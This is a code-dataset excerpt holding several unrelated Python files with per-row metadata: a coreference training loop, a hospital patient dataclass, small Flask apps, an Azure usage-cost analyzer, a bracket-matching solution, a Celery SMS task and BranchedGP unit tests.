                                               curr_step["head_attention"].repeat((num_candidates - 1, 1)))
                # [1, num_candidates]; the dummy antecedent gets a fixed score of 0.
                candidate_scores = torch.cat((torch.tensor([0.0], device=DEVICE),
                                              candidate_scores.flatten())).unsqueeze(0)
                curr_pred = torch.argmax(candidate_scores)
                doc_loss += self.loss(candidate_scores.repeat((len(correct_antecedents), 1)),
                                      torch.tensor(correct_antecedents, device=DEVICE))
            # { antecedent: [mention(s)] } pair
            existing_refs = preds.get(candidates[int(curr_pred)], [])
            existing_refs.append(head_id)
            preds[candidates[int(curr_pred)]] = existing_refs
        if not eval_mode:
            # NOTE(review): if no step had >1 candidate (e.g. a single-mention
            # document), doc_loss is still the float 0.0 and .backward() would
            # raise AttributeError — confirm such documents cannot occur here.
            doc_loss.backward()
            self.optimizer.step()
            self.optimizer.zero_grad()
        return preds, (float(doc_loss), n_examples)
if __name__ == "__main__":
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.INFO)
args = parser.parse_args()
if args.random_seed:
np.random.seed(args.random_seed)
torch.random.manual_seed(args.random_seed)
documents = read_corpus(args.dataset)
def create_model_instance(model_name, **override_kwargs):
return ContextualControllerELMo(model_name=model_name,
fc_hidden_size=override_kwargs.get("fc_hidden_size", args.fc_hidden_size),
hidden_size=override_kwargs.get("hidden_size", args.hidden_size),
dropout=override_kwargs.get("dropout", args.dropout),
pretrained_embeddings_dir="../data/slovenian-elmo",
freeze_pretrained=override_kwargs.get("freeze_pretrained", args.freeze_pretrained),
learning_rate=override_kwargs.get("learning_rate", args.learning_rate),
max_segment_size=override_kwargs.get("max_segment_size", args.max_segment_size),
layer_learning_rate={
"lr_embedder": 10e-5} if not args.freeze_pretrained else None,
dataset_name=override_kwargs.get("dataset", args.dataset))
# Train model
if args.dataset == "coref149":
INNER_K, OUTER_K = 3, 10
logging.info(f"Performing {OUTER_K}-fold (outer) and {INNER_K}-fold (inner) CV...")
save_path = "cache_run_contextual_elmo_coref149.json"
if args.kfold_state_cache_path is None:
train_test_folds = KFold(n_splits=OUTER_K, shuffle=True).split(documents)
train_test_folds = [{
"train_docs": [documents[_i].doc_id for _i in train_dev_index],
"test_docs": [documents[_i].doc_id for _i in test_index]
} for train_dev_index, test_index in train_test_folds]
fold_cache = KFoldStateCache(script_name="contextual_model_elmo.py",
script_args=vars(args),
main_dataset=args.dataset,
additional_dataset=None,
fold_info=train_test_folds)
else:
fold_cache = KFoldStateCache.from_file(args.kfold_state_cache_path)
OUTER_K = fold_cache.num_folds
for curr_fold_data in fold_cache.get_next_unfinished():
curr_train_dev_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["train_docs"]), documents))
curr_test_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["test_docs"]), documents))
logging.info(f"Fold#{curr_fold_data['idx_fold']}...")
best_metric, best_name = float("inf"), None
for idx_inner_fold, (train_index, dev_index) in enumerate(KFold(n_splits=INNER_K).split(curr_train_dev_docs)):
curr_train_docs = [curr_train_dev_docs[_i] for _i in train_index]
curr_dev_docs = [curr_train_dev_docs[_i] for _i in dev_index]
curr_model = create_model_instance(model_name=f"fold{curr_fold_data['idx_fold']}_{idx_inner_fold}")
dev_loss = curr_model.train(epochs=args.num_epochs, train_docs=curr_train_docs, dev_docs=curr_dev_docs)
logging.info(f"Fold {curr_fold_data['idx_fold']}-{idx_inner_fold}: {dev_loss: .5f}")
if dev_loss < best_metric:
best_metric = dev_loss
best_name = curr_model.path_model_dir
logging.info(f"Best model: {best_name}, best loss: {best_metric: .5f}")
curr_model = ContextualControllerELMo.from_pretrained(best_name)
curr_test_metrics = curr_model.evaluate(curr_test_docs)
curr_model.visualize()
curr_test_metrics_expanded = {}
for metric, metric_value in curr_test_metrics.items():
curr_test_metrics_expanded[f"{metric}_p"] = float(metric_value.precision())
curr_test_metrics_expanded[f"{metric}_r"] = float(metric_value.recall())
curr_test_metrics_expanded[f"{metric}_f1"] = float(metric_value.f1())
fold_cache.add_results(idx_fold=curr_fold_data["idx_fold"], results=curr_test_metrics_expanded)
fold_cache.save(save_path)
logging.info(f"Final scores (over {OUTER_K} folds)")
aggregated_metrics = {}
for curr_fold_data in fold_cache.fold_info:
for metric, metric_value in curr_fold_data["results"].items():
existing = aggregated_metrics.get(metric, [])
existing.append(metric_value)
aggregated_metrics[metric] = existing
for metric, metric_values in aggregated_metrics.items():
logging.info(f"- {metric}: mean={np.mean(metric_values): .4f} +- sd={np.std(metric_values): .4f}\n"
f"\t all fold scores: {metric_values}")
else:
logging.info(f"Using single train/dev/test split...")
if args.fixed_split:
logging.info("Using fixed dataset split")
train_docs, dev_docs, test_docs = fixed_split(documents, args.dataset)
else:
train_docs, dev_docs, test_docs = split_into_sets(documents, train_prop=0.7, dev_prop=0.15, test_prop=0.15)
model = create_model_instance(model_name=args.model_name)
if not model.loaded_from_file:
model.train(epochs=args.num_epochs, train_docs=train_docs, dev_docs=dev_docs)
# Reload best checkpoint
model = ContextualControllerELMo.from_pretrained(model.path_model_dir)
model.evaluate(test_docs)
model.visualize()
| en | 0.769076 | # if None, process sentences independently # Write controller config (used for instantiation) # Save fine-tuned ELMo embeddings only if they're not frozen Returns a cache dictionary with preprocessed data. This should only be called once per document, since data inside same document does not get shuffled. # By default, each sentence is its own segment, meaning sentences are processed independently # Optionally, one can specify max_segment_size, in which case segments of tokens are processed independently # Convention: Add a PAD word ([0] * max_chars vector) at the end of each segment, for padding mentions # Note: no data for dummy antecedent (len(`features`) is one less than `candidates`) # Maps tokens to positions inside segments (idx_seg, idx_inside_seg) for efficient indexing later # padding tokens index into the PAD token of the last segment Trains/evaluates (if `eval_mode` is True) model on specific document. Returns predictions, loss and number of examples evaluated. # type: Dict # Note: max_segment_size is either specified at instantiation or (the length of longest sentence + 1) # [num_segments, max_segment_size, embedding_size] # [num_segments, max_segment_size, 2 * hidden_size] # Note: num_candidates includes dummy antecedent + actual candidates # [num_candidates, max_span_size, embedding_size] # [1, head_size, embedding_size] # [1, num_candidates] # { antecedent: [mention(s)] } pair # Train model #{curr_fold_data['idx_fold']}...") # Reload best checkpoint | 2.102326 | 2 |
src/hospital/people.py | nhsx-mirror/skunkworks-bed-allocation | 12 | 6614017 | <reponame>nhsx-mirror/skunkworks-bed-allocation<filename>src/hospital/people.py<gh_stars>10-100
from dataclasses import asdict, dataclass, field
from enum import Enum
from typing import Any, Dict, Optional
from warnings import warn
import hospital.restrictions.people as R
from hospital.data import Department, Sex, Specialty
from hospital.equipment.bed import Bed
@dataclass
class Patient:
    """
    A hospital patient together with the bed-allocation restrictions
    implied by their clinical flags.
    """
    name: str
    sex: str
    department: str
    specialty: str = "general"
    weight: float = 70.0
    age: Optional[int] = None
    is_known_covid: bool = False
    is_suspected_covid: bool = False
    is_acute_surgical: bool = False
    is_elective: bool = False
    needs_mobility_assistence: bool = False
    is_dementia_risk: bool = False
    is_high_acuity: bool = False
    is_immunosupressed: bool = False
    is_end_of_life: bool = False
    is_infection_control: bool = False
    is_falls_risk: bool = False
    needs_visual_supervision: bool = False
    expected_length_of_stay: int = 1
    length_of_stay: int = 0
    bed: Optional[Bed] = None
    restrictions: list = field(default_factory=list)

    def __post_init__(self):
        """Coerce categorical fields to enums and derive restrictions."""
        # Convert and validate the enum-backed fields.
        self.sex = self._validate_enums(self.sex, Sex)
        self.department = self._validate_enums(self.department, Department)
        self.specialty = self._validate_enums(self.specialty, Specialty)
        # (flag, restriction class, weight) rules, appended in priority order.
        rules = (
            (self.is_immunosupressed, R.NeedsSideRoom, 10),
            (self.is_end_of_life, R.NeedsSideRoom, 3),
            (self.is_infection_control, R.NeedsSideRoom, 4),
            (self.is_falls_risk, R.ProhibitedSideRoom, 5),
            (self.needs_visual_supervision, R.NeedsVisualSupervision, 5),
        )
        for flagged, restriction_cls, weight in rules:
            if flagged:
                self.restrictions.append(restriction_cls(weight))

    def _validate_enums(self, value, enum_class):
        """Look *value* up in *enum_class* by lower-cased member name.

        Unknown values print a warning and fall through (returning None),
        preserving the original lenient behaviour.
        """
        key = value.lower()
        if key in enum_class.__members__:
            return enum_class[key]
        print(
            f"Incorrect value for {enum_class.__name__.lower()} ",
            f"attribute : {value}",
        )

    def eval_restrictions(self):
        """Evaluate every restriction against this patient.

        Returns {"score": total penalty, "names": restriction names repeated
        once per violated penalty unit}.
        """
        score = 0
        labels = []
        for restriction in self.restrictions:
            value = restriction.evaluate(self)
            if value <= 0:
                continue
            name, unit = restriction._key()
            score += value
            labels.extend([name] * int(value / unit))
        return {"score": score, "names": labels}

    def allocate(self, bed):
        """Place the patient in *bed*, warning if they already occupy one."""
        already_placed = self.bed is not None
        if already_placed:
            warn(f"Patient {self.name} is already in bed {self.bed.name}.")
        self.bed = bed

    def discharge(self):
        """Free the patient's bed."""
        self.bed = None
def patient_to_dict(patient: "Patient") -> Dict[str, Any]:
    """
    Returns dictionary representation of a Patient class instance.

    Enum-valued fields (sex, department, specialty) are serialised to
    their member names; every other value is passed through unchanged.
    """
    def _patient_dict(field_pairs) -> Dict[str, Any]:
        """
        Dictionary factory for asdict: receives (name, value) pairs and
        replaces Enum values with their names.
        """
        # Loop variable renamed from `field` — the original shadowed
        # dataclasses.field imported at module level. The old annotation
        # (`patient: Patient`) was also wrong: dict_factory gets pairs.
        return {
            key: (value if not isinstance(value, Enum) else value.name)
            for key, value in field_pairs
        }
    return asdict(patient, dict_factory=_patient_dict)
| from dataclasses import asdict, dataclass, field
from enum import Enum
from typing import Any, Dict, Optional
from warnings import warn
import hospital.restrictions.people as R
from hospital.data import Department, Sex, Specialty
from hospital.equipment.bed import Bed
@dataclass
class Patient:
"""
Patient dataclass
"""
name: str
sex: str
department: str
specialty: str = "general"
weight: float = 70.0
age: Optional[int] = None
is_known_covid: bool = False
is_suspected_covid: bool = False
is_acute_surgical: bool = False
is_elective: bool = False
needs_mobility_assistence: bool = False
is_dementia_risk: bool = False
is_high_acuity: bool = False
is_immunosupressed: bool = False
is_end_of_life: bool = False
is_infection_control: bool = False
is_falls_risk: bool = False
needs_visual_supervision: bool = False
expected_length_of_stay: int = 1
length_of_stay: int = 0
bed: Optional[Bed] = None
restrictions: list = field(default_factory=list)
def __post_init__(self):
# convert and validate enums
self.sex = self._validate_enums(self.sex, Sex)
self.department = self._validate_enums(self.department, Department)
self.specialty = self._validate_enums(self.specialty, Specialty)
# initialise restrictions
if self.is_immunosupressed:
self.restrictions.append(R.NeedsSideRoom(10))
if self.is_end_of_life:
self.restrictions.append(R.NeedsSideRoom(3))
if self.is_infection_control:
self.restrictions.append(R.NeedsSideRoom(4))
if self.is_falls_risk:
self.restrictions.append(R.ProhibitedSideRoom(5))
if self.needs_visual_supervision:
self.restrictions.append(R.NeedsVisualSupervision(5))
def _validate_enums(self, value, enum_class):
try:
return enum_class[value.lower()]
except KeyError:
print(
f"Incorrect value for {enum_class.__name__.lower()} ",
f"attribute : {value}",
)
def eval_restrictions(self):
penalty = 0
names = []
for r in self.restrictions:
total_penalty = r.evaluate(self)
if total_penalty > 0:
n, p = r._key()
penalty += total_penalty
names += [n for _ in range(int(total_penalty / p))]
return {"score": penalty, "names": names}
def allocate(self, bed):
if self.bed is not None:
warn(f"Patient {self.name} is already in bed {self.bed.name}.")
self.bed = bed
def discharge(self):
self.bed = None
def patient_to_dict(patient: Patient) -> Dict[str, Any]:
"""
Returns dictionary representation of a Patient class instance.
"""
def _patient_dict(patient: Patient) -> Dict[str, Any]:
"""
Dictionary factory to convert Patient class instance
to patient details dictionary.
"""
return {
field: (value if not isinstance(value, Enum) else value.name)
for field, value in patient
}
return asdict(patient, dict_factory=_patient_dict) | en | 0.525697 | Patient dataclass # convert and validate enums # initialise restrictions Returns dictionary representation of a Patient class instance. Dictionary factory to convert Patient class instance to patient details dictionary. | 2.73252 | 3 |
p04_cookies/main.py | AndreiHondrari/flask_exploration | 0 | 6614018 | <gh_stars>0
#!python
from flask import Flask, render_template, request, make_response
from typing import Union, Optional
# Flask application demonstrating cookie round-trips.
app = Flask(__name__)
@app.route("/")
def index() -> None:
number: Optional[Union[str, int]] = request.cookies.get('number')
number = int(number) if number is not None else 0
context = {
"number": number
}
resp = make_response(render_template("index.html", **context))
resp.set_cookie("number", str(number + 1))
return resp
if __name__ == "__main__":
app.run(debug=True)
| #!python
from flask import Flask, render_template, request, make_response
from typing import Union, Optional
app = Flask(__name__)
@app.route("/")
def index() -> None:
number: Optional[Union[str, int]] = request.cookies.get('number')
number = int(number) if number is not None else 0
context = {
"number": number
}
resp = make_response(render_template("index.html", **context))
resp.set_cookie("number", str(number + 1))
return resp
if __name__ == "__main__":
app.run(debug=True) | none | 1 | 2.801391 | 3 | |
analyzer.py | JavaJHMalerBus/azure_analyzer | 0 | 6614019 | <filename>analyzer.py
#!/usr/bin/env python
import json
import tkinter as tk
from tkinter import filedialog
import texttable
import argparse
# Hidden Tk root window: needed only so the file-chooser dialog can be shown.
rt = tk.Tk()
rt.withdraw()
parser = argparse.ArgumentParser(description='Analyzes and summarizes an AzureUsage.json file')
parser.add_argument('--path', action='store', default='',
                    help='The path to the AzureUsage.json file. If not provided, a file chooser dialog will '
                         'pop up.')
parser.add_argument('--detail', action='store', default=-1, type=int, help='Shows detailed information about the '
                                                                           'given id. The '
                                                                           'id equals to the #-column shown when this '
                                                                           'parameter '
                                                                           ' is left out.')
parser.add_argument('--subscriptions', action='store_true', help='Lists all subscriptions that were found within the '
                                                                 'file.')
parser.add_argument('--group', action='store_true', help='Groups the overview by subscriptions.')
args = parser.parse_args()
# Resolve the input path: the CLI flag wins, otherwise ask via a file dialog.
json_path = args.path if args.path != '' else filedialog.askopenfilename()
def initialize_mappings(d):
    """Aggregate raw usage records by service name.

    Zero-cost records are skipped. When a service appears multiple times,
    its ``Quantity`` and ``Cost`` are summed into the first record seen
    (that record dict is mutated in place).

    Returns a tuple ``(do, mapping)``: ``do`` maps service name ->
    aggregated record, ``mapping`` lists service names in first-seen
    order (the overview id -> name lookup).
    """
    do = {}
    for item in d:
        if item["Cost"] == 0:
            continue  # zero-cost rows carry no billing information
        name = item["ServiceName"]
        if name in do:
            do[name]["Quantity"] += item["Quantity"]
            do[name]["Cost"] += item["Cost"]
        else:
            do[name] = item
    # dict preserves insertion order, so the keys double as the id mapping
    # (replaces the original redundant enumerate loop).
    mapping = list(do)
    return do, mapping
def initialize_subscriptions(do):
    """Collect subscription metadata and per-subscription service counts.

    ``do`` is the aggregated record dict produced by initialize_mappings.

    Returns ``(subs_dict, subs_usages)``: GUID -> metadata dict, and
    GUID -> number of services billed to that subscription.
    """
    subs_dict = {}
    subs_usages = {}
    # The original enumerate/.items() loop never used the index or key;
    # iterating the values and hoisting the GUID lookup is equivalent.
    for value in do.values():
        guid = value["SubscriptionGuid"]
        if guid not in subs_dict:
            subs_dict[guid] = {
                "SubscriptionName": value["SubscriptionName"],
                "SubscriptionGUID": guid,
            }
        subs_usages[guid] = subs_usages.get(guid, 0) + 1
    return subs_dict, subs_usages
def group_by_subscription(do):
    """Group aggregated usage records by their subscription GUID.

    Returns GUID -> list of record dicts, preserving first-seen order.
    """
    res = {}
    # setdefault replaces the original if/else grouping branches.
    for value in do.values():
        res.setdefault(value["SubscriptionGuid"], []).append(value)
    return res
def parse(d, group_by_sub=False):
    """Print the cost-overview table for the given usage records.

    When ``group_by_sub`` is True the rows are ordered so that services
    billed to the same subscription appear together; the row numbering
    stays continuous either way.
    """
    aggregated, _ = initialize_mappings(d)

    def unit_price(record):
        # "N/A" when either quantity or cost is non-positive.
        if record["Quantity"] > 0 and record["Cost"] > 0:
            return record["Cost"] / record["Quantity"]
        return "N/A"

    if group_by_sub:
        ordered = []
        for bucket in group_by_subscription(aggregated).values():
            ordered.extend(bucket)
    else:
        ordered = list(aggregated.values())

    table = texttable.Texttable()
    table.add_row(["#", "Name", "Price per unit", "Quantity", "Price"])
    for row_id, record in enumerate(ordered):
        table.add_row([row_id, record["ServiceName"], unit_price(record),
                       record["Quantity"], record["Cost"]])
    print(table.draw())
def print_subscriptions(d):
    """Print a table of every subscription found in the usage records.

    Fix: ``initialize_subscriptions`` iterates ``.items()`` and therefore
    needs the aggregated dict produced by ``initialize_mappings``. The
    raw record *list* was previously passed in, which crashed with
    ``AttributeError: 'list' object has no attribute 'items'``.
    """
    aggregated, _ = initialize_mappings(d)
    subs, usages = initialize_subscriptions(aggregated)
    table = texttable.Texttable()
    table.add_row(["#", "Name", "Identifier", "Usages"])
    for i, (guid, value) in enumerate(subs.items()):
        table.add_row([i, value["SubscriptionName"], guid, usages[guid]])
    print(table.draw())
def detail(id, d):
    """Print full details for the service with overview index ``id``.

    ``id`` must be the #-column value from a previous overview run; an
    out-of-range id prints an error instead of a table.

    Note: the parameter name ``id`` shadows the builtin; it is kept for
    backward compatibility with existing callers.
    """
    do, mapping = initialize_mappings(d)
    if not (0 <= id < len(mapping)):
        print("Id not found! Was the file changed since you retrieved the id?")
        return
    # Hoisted: the original repeated the do[mapping[id]] lookup eight times.
    item = do[mapping[id]]
    unit_price = (item["Cost"] / item["Quantity"]
                  if (item["Quantity"] > 0 and item["Cost"] > 0) else "N/A")
    table = texttable.Texttable()
    table.add_row(["#", "Name", "Type", "Region", "Subscription", "Price per unit", "Quantity", "Price"])
    table.add_row([id, item["ServiceName"], item["ServiceType"], item["ServiceRegion"],
                   item["SubscriptionName"], unit_price, item["Quantity"], item["Cost"]])
    print(table.draw())
# Load the exported usage data and dispatch on the CLI flags.
with open(json_path) as json_file:
    data = json.load(json_file)
print("Parsing data from subscription \"" + data[0]["SubscriptionName"] + "\"...")
if args.detail == -1:
    # No --detail id given: show either the subscription list or the overview.
    if args.subscriptions:
        print_subscriptions(data)
    else:
        parse(data, args.group)
else:
    detail(args.detail, data)
| <filename>analyzer.py
#!/usr/bin/env python
import json
import tkinter as tk
from tkinter import filedialog
import texttable
import argparse
rt = tk.Tk()
rt.withdraw()
parser = argparse.ArgumentParser(description='Analyzes and summarizes an AzureUsage.json file')
parser.add_argument('--path', action='store', default='',
help='The path to the AzureUsage.json file. If not provided, a file chooser dialog will '
'pop up.')
parser.add_argument('--detail', action='store', default=-1, type=int, help='Shows detailed information about the '
'given id. The '
'id equals to the #-column shown when this '
'parameter '
' is left out.')
parser.add_argument('--subscriptions', action='store_true', help='Lists all subscriptions that were found within the '
'file.')
parser.add_argument('--group', action='store_true', help='Groups the overview by subscriptions.')
args = parser.parse_args()
json_path = args.path if args.path != '' else filedialog.askopenfilename()
def initialize_mappings(d):
do = {}
mapping = []
for item in d:
if item["Cost"] == 0:
continue
if item["ServiceName"] in do:
do[item["ServiceName"]]["Quantity"] += item["Quantity"]
do[item["ServiceName"]]["Cost"] += item["Cost"]
else:
do[item["ServiceName"]] = item
for i, (name, value) in enumerate(do.items()):
mapping.append(name)
return do, mapping
def initialize_subscriptions(do):
subs_dict = {}
subs_usages = {}
for i, (name, value) in enumerate(do.items()):
if value["SubscriptionGuid"] not in subs_dict:
subs_dict[value["SubscriptionGuid"]] = {
"SubscriptionName": value["SubscriptionName"],
"SubscriptionGUID": value["SubscriptionGuid"],
}
if value["SubscriptionGuid"] not in subs_usages:
subs_usages[value["SubscriptionGuid"]] = 1
else:
subs_usages[value["SubscriptionGuid"]] += 1
return subs_dict, subs_usages
def group_by_subscription(do):
res = {}
for i, (name, value) in enumerate(do.items()):
if value["SubscriptionGuid"] not in res:
res[value["SubscriptionGuid"]] = [value]
else:
res[value["SubscriptionGuid"]].append(value)
return res
def parse(d, group_by_sub=False):
do, mapping = initialize_mappings(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Price per unit", "Quantity", "Price"])
if not group_by_sub:
for i, (name, value) in enumerate(do.items()):
table.add_row([i, value["ServiceName"],
value["Cost"] / value["Quantity"] if (value["Quantity"] > 0 and value["Cost"] > 0) else "N/A",
value["Quantity"], value["Cost"]])
else:
grouped = group_by_subscription(do)
i = 0
for x, (guid, items) in enumerate(grouped.items()):
for value in items:
table.add_row([i, value["ServiceName"],
value["Cost"] / value["Quantity"] if (
value["Quantity"] > 0 and value["Cost"] > 0) else "N/A",
value["Quantity"], value["Cost"]])
i += 1
print(table.draw())
def print_subscriptions(d):
do, mapping = initialize_mappings(d)
subs, usages = initialize_subscriptions(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Identifier", "Usages"])
for i, (guid, value) in enumerate(subs.items()):
table.add_row([i, value["SubscriptionName"], guid, usages[guid]])
print(table.draw())
def detail(id, d):
do, mapping = initialize_mappings(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Type", "Region", "Subscription", "Price per unit", "Quantity", "Price"])
if len(mapping) > id >= 0:
table.add_row(
[id, do[mapping[id]]["ServiceName"], do[mapping[id]]["ServiceType"], do[mapping[id]]["ServiceRegion"],
do[mapping[id]]["SubscriptionName"],
do[mapping[id]]["Cost"] / do[mapping[id]]["Quantity"] if (
do[mapping[id]]["Quantity"] > 0 and do[mapping[id]]["Cost"] > 0) else "N/A",
do[mapping[id]]["Quantity"], do[mapping[id]]["Cost"]])
else:
print("Id not found! Was the file changed since you retrieved the id?")
return
print(table.draw())
with open(json_path) as json_file:
data = json.load(json_file)
print("Parsing data from subscription \"" + data[0]["SubscriptionName"] + "\"...")
if args.detail == -1:
if args.subscriptions:
print_subscriptions(data)
else:
parse(data, args.group)
else:
detail(args.detail, data)
| en | 0.070296 | #!/usr/bin/env python #-column shown when this ' | 3.509628 | 4 |
BOJ_Solved/BOJ-9012.py | CodingLeeSeungHoon/Python_Algorithm_TeamNote | 7 | 6614020 | <filename>BOJ_Solved/BOJ-9012.py
"""
백준 9012번 : 괄호
"""
test = int(input( ))
result = []
def is_vps(ps):
    """Return True if *ps* is a balanced parenthesis string.

    A depth counter replaces the original list-of-1s pseudo-stack and its
    awkward ``del stack[len(stack) - 1]`` pop. Characters other than
    '(' and ')' are ignored, matching the original behaviour.
    """
    depth = 0
    for p in ps:
        if p == '(':
            depth += 1
        elif p == ')':
            if depth == 0:
                return False  # closing parenthesis with nothing open
            depth -= 1
    # Balanced only if every opener was closed.
    return depth == 0
def print_yes_or_no(result):
    """Print 'YES'/'NO' for each boolean verdict, one per line.

    Fixes the ``r == True`` anti-idiom by testing truthiness directly.
    """
    for r in result:
        print('YES' if r else 'NO')
# Read each parenthesis string, classify it, then print all verdicts.
for _ in range(test):
    ps = input( )
    result.append(is_vps(ps))
print_yes_or_no(result)
| <filename>BOJ_Solved/BOJ-9012.py
"""
백준 9012번 : 괄호
"""
test = int(input( ))
result = []
def is_vps(ps):
stack = []
for p in ps:
if len(stack) == 0 and p == ')':
return False
elif p == ')':
del stack[len(stack) - 1]
elif p == '(':
stack.append(1)
if len(stack) == 0:
return True
else:
return False
def print_yes_or_no(result):
for r in result:
if r == True:
print('YES')
else:
print('NO')
for _ in range(test):
ps = input( )
result.append(is_vps(ps))
print_yes_or_no(result)
| ko | 0.997577 | 백준 9012번 : 괄호 | 3.593254 | 4 |
wef/items/tasks/send_buy_message.py | deadlylaid/study_alone | 6 | 6614021 | <reponame>deadlylaid/study_alone
from celery import Task
from items.utils import SendSMS
class SendBuyMessageTask(Task):
    """Celery task that sends a purchase-notification SMS for a book sale."""

    def run(self, buyer_nickname, buyer_phone, saler_phone, selected_bookname):
        # Delegate the actual delivery to the SMS helper.
        SendSMS().send_sms(buyer_nickname, buyer_phone, saler_phone, selected_bookname)
        print("Task success")
| from celery import Task
from items.utils import SendSMS
class SendBuyMessageTask(Task):
def run(self, buyer_nickname, buyer_phone, saler_phone, selected_bookname):
sms = SendSMS()
sms.send_sms(buyer_nickname, buyer_phone, saler_phone, selected_bookname)
print("Task success") | none | 1 | 2.11096 | 2 | |
whereis-master/whereis-backend/main.py | jaakaappi/archived-projects | 0 | 6614022 | <reponame>jaakaappi/archived-projects<gh_stars>0
from database import database
from flask import Flask, render_template, jsonify, request, abort
from flask_cors import CORS
# Flask app; CORS is enabled so a frontend on another origin can call the API.
app = Flask(__name__)
CORS(app)
@app.route('/locations', methods=['GET'])
def locations():
    """Return all known storage locations as JSON."""
    return jsonify(database.get_locations())
@app.route('/items/<int:count>')
def items(count):
    """Return items as JSON; *count* is forwarded to the database query."""
    return jsonify(database.get_items(count))
@app.route('/items', methods=['GET'])
def find_items():
    """Search items by the optional ``name``/``location`` query parameters.

    At least one of the two filters must be supplied, otherwise the
    request is rejected with HTTP 400.
    """
    name = request.args.get('name')
    location = request.args.get('location')
    if not (name or location):
        # Refuse unfiltered queries.
        return abort(400)
    matches = database.get_items(None, name, location)
    return jsonify(matches)
@app.route('/items', methods=['PUT', 'POST'])
def add_item():
    # NOTE(review): currently a stub — it only logs the JSON payload and the
    # query parameters; nothing is persisted to the database yet.
    print(request.json)
    name = request.args.get('name')
    location = request.args.get('location')
    print('adding', name, location)
    # TODO: persist the item and return a meaningful status/body.
    return ""
if __name__ == '__main__':
    # Seed the database with demo data on first run.
    if database.is_empty():
        database.fill_test_db()
    # 0.0.0.0: listen on all interfaces (development server).
    app.run(host='0.0.0.0')
| from database import database
from flask import Flask, render_template, jsonify, request, abort
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
@app.route('/locations', methods=['GET'])
def locations():
return jsonify(database.get_locations())
@app.route('/items/<int:count>')
def items(count):
return jsonify(database.get_items(count))
@app.route('/items', methods=['GET'])
def find_items():
name = request.args.get('name')
location = request.args.get('location')
if name or location:
items = database.get_items(None, name, location)
return jsonify(items)
else:
return abort(400)
@app.route('/items', methods=['PUT', 'POST'])
def add_item():
print(request.json)
name = request.args.get('name')
location = request.args.get('location')
print('adding', name, location)
return ""
if __name__ == '__main__':
if database.is_empty():
database.fill_test_db()
app.run(host='0.0.0.0') | none | 1 | 2.623255 | 3 | |
testing/testpZ_construct.py | elvijs/BranchedGP | 1 | 6614023 | <filename>testing/testpZ_construct.py
# Generic libraries
import numpy as np
import tensorflow as tf
import unittest
# Branching files
from BranchedGP import pZ_construction_singleBP
from gpflow import settings
class TestpZ(unittest.TestCase):
    """Tests for the single-branch-point pZ prior-matrix construction."""

    def test_pZ(self):
        """For several branch points, check each row of the built matrix:
        before the branch point the row is the trunk one-hot [1, 0, 0];
        after it, the two branch entries equal the supplied prior pZ0."""
        np.set_printoptions(suppress=True, precision=2)
        X = np.linspace(0, 1, 4, dtype=float)[:, None]
        X = np.sort(X, 0)
        BP_tf = tf.placeholder(settings.float_type, shape=[])
        eZ0_tf = tf.placeholder(settings.float_type, shape=(X.shape[0], X.shape[0]*3))
        pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [1, 0]])
        eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
        for BP in [0, 0.2, 0.5, 1]:
            print('========== BP %.2f ===========' % BP)
            pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
            print('pZ0', pZ0)
            print('eZ0', eZ0)
            print('pZ', pZ)
            # Each data point r owns a 3-wide column block starting at c.
            for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
                print(X[r], pZ[r, c:c+3], pZ0[r, :])
                if(X[r] > BP):  # after branch point should be prior
                    self.assertTrue(np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6),
                                    'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
                else:
                    self.assertTrue(np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6),
                                    'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))

    def test_further(self):
        """Cross-check the TF matrix construction against the pure-numpy
        implementation (expand_pZ0PureNumpyZeros) for two branch points."""
        np.set_printoptions(suppress=True, precision=6)
        # X = np.linspace(0, 1, 4, dtype=float)[:, None]
        X = np.array([0.1, 0.2, 0.3, 0.4])[:, None]
        BP_tf = tf.placeholder(dtype=settings.float_type, shape=[])
        eZ0_tf = tf.placeholder(dtype=settings.float_type, shape=(X.shape[0], X.shape[0]*3))
        pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [0.85, 0.15]])
        eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
        BP = 0.2
        pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
        print('pZ0', pZ0)
        print('eZ0', eZ0)
        print('pZ', pZ)
        for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
            print(r, c)
            print(X[r], pZ[r, c:c+3], pZ0[r, :])
            if(X[r] > BP): # after branch point should be prior
                assert np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :]))
            else:
                assert np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(np.array([1., 0., 0.])))
        # from matplotlib import pyplot as plt
        # plt.ion()
        # plt.matshow(pZ)
        eZ0z = pZ_construction_singleBP.expand_pZ0Zeros(pZ0)
        r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, BP, X)
        assert np.allclose(r, pZ, atol=1e-5)
        # try another
        pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: 0.3, eZ0_tf: eZ0})
        r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, 0.3, X)
        assert np.allclose(r, pZ, atol=1e-5)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| <filename>testing/testpZ_construct.py
# Generic libraries
import numpy as np
import tensorflow as tf
import unittest
# Branching files
